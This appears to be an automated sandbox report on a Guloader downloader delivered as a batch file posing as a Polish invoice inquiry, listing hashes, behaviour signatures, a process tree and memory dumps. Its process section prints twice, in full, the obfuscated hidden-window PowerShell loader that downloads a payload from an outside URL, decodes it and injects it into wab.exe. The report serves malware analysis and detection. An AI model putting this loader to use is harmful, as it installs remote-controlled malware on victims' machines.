Analysis

  • max time kernel
    93s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-07-2024 15:00

General

  • Target

    FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat

  • Size

    6KB

  • MD5

    4eeae7ac7c9b2b2f6585cbfdb82ffd89

  • SHA1

    7978841d26d2be27f6b873a6b3fca3bd999329aa

  • SHA256

    96510f0af47cb70914f106bd98fc99b4a5f782c744dbe587368f8614565a6f47

  • SHA512

    149edad5906d359b943d24f900c868dca0a65aa305dd571c1cfa28e6eeaec654109ad7013d5ba149fd40c341ac50ff3510297bf390a70269faeb2244a8f5f31c

  • SSDEEP

    96:gv/UAWv/UAV1161kylTQdpXxJnSI4ceniGcdZYi8KqYdoTZDm3xMtt8ln9Ex61MV:icHc81xqQTXP/uiG6D8KqYdo1exMzoYV

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings '.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3104
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
        3⤵
          PID:2284
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings '.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3108
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
            4⤵
              PID:4684
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:4744
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 1532
                5⤵
                • Program crash
                PID:1304
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4744 -ip 4744
        1⤵
          PID:1084

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_noo1dwqk.whx.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Coumarate.Bic

          Filesize

          423KB

          MD5

          007cf6a92566beeac721341fb07ee93e

          SHA1

          8fcb0b9135d89b7cd0d038471bb901c20bee48b7

          SHA256

          362053d0e47717d018306ff0785c59415a2c7a72a44aa1140103efe093f584d8

          SHA512

          aad75aa8b7e967723996369c1d6ea0f3fced41b6748496b811024ce7202fab5839290b91222b4cad71d9db53f1efbeab851132823da710d6739297a21ad5cd41

        • memory/3104-3-0x00000221C8770000-0x00000221C8792000-memory.dmp

          Filesize

          136KB

        • memory/3104-13-0x00007FFBBEE30000-0x00007FFBBF8F1000-memory.dmp

          Filesize

          10.8MB

        • memory/3104-14-0x00007FFBBEE30000-0x00007FFBBF8F1000-memory.dmp

          Filesize

          10.8MB

        • memory/3104-60-0x00007FFBBEE30000-0x00007FFBBF8F1000-memory.dmp

          Filesize

          10.8MB

        • memory/3104-45-0x00007FFBBEE30000-0x00007FFBBF8F1000-memory.dmp

          Filesize

          10.8MB

        • memory/3104-43-0x00007FFBBEE33000-0x00007FFBBEE35000-memory.dmp

          Filesize

          8KB

        • memory/3104-2-0x00007FFBBEE33000-0x00007FFBBEE35000-memory.dmp

          Filesize

          8KB

        • memory/3108-20-0x0000000075120000-0x00000000758D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3108-41-0x0000000008150000-0x00000000086F4000-memory.dmp

          Filesize

          5.6MB

        • memory/3108-23-0x0000000004E80000-0x0000000004EE6000-memory.dmp

          Filesize

          408KB

        • memory/3108-24-0x00000000055B0000-0x0000000005616000-memory.dmp

          Filesize

          408KB

        • memory/3108-34-0x00000000056A0000-0x00000000059F4000-memory.dmp

          Filesize

          3.3MB

        • memory/3108-35-0x0000000005CD0000-0x0000000005CEE000-memory.dmp

          Filesize

          120KB

        • memory/3108-36-0x0000000005CF0000-0x0000000005D3C000-memory.dmp

          Filesize

          304KB

        • memory/3108-37-0x0000000007520000-0x0000000007B9A000-memory.dmp

          Filesize

          6.5MB

        • memory/3108-38-0x0000000006220000-0x000000000623A000-memory.dmp

          Filesize

          104KB

        • memory/3108-39-0x0000000006F80000-0x0000000007016000-memory.dmp

          Filesize

          600KB

        • memory/3108-40-0x0000000006F10000-0x0000000006F32000-memory.dmp

          Filesize

          136KB

        • memory/3108-22-0x0000000004DD0000-0x0000000004DF2000-memory.dmp

          Filesize

          136KB

        • memory/3108-21-0x0000000075120000-0x00000000758D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3108-19-0x0000000004F10000-0x0000000005538000-memory.dmp

          Filesize

          6.2MB

        • memory/3108-44-0x0000000008700000-0x000000000AFC0000-memory.dmp

          Filesize

          40.8MB

        • memory/3108-18-0x0000000004730000-0x0000000004766000-memory.dmp

          Filesize

          216KB

        • memory/3108-47-0x000000007512E000-0x000000007512F000-memory.dmp

          Filesize

          4KB

        • memory/3108-48-0x0000000075120000-0x00000000758D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3108-49-0x0000000075120000-0x00000000758D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3108-57-0x0000000075120000-0x00000000758D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3108-17-0x000000007512E000-0x000000007512F000-memory.dmp

          Filesize

          4KB

        • memory/4744-56-0x0000000001200000-0x0000000003AC0000-memory.dmp

          Filesize

          40.8MB

        • memory/4744-65-0x0000000001200000-0x0000000003AC0000-memory.dmp

          Filesize

          40.8MB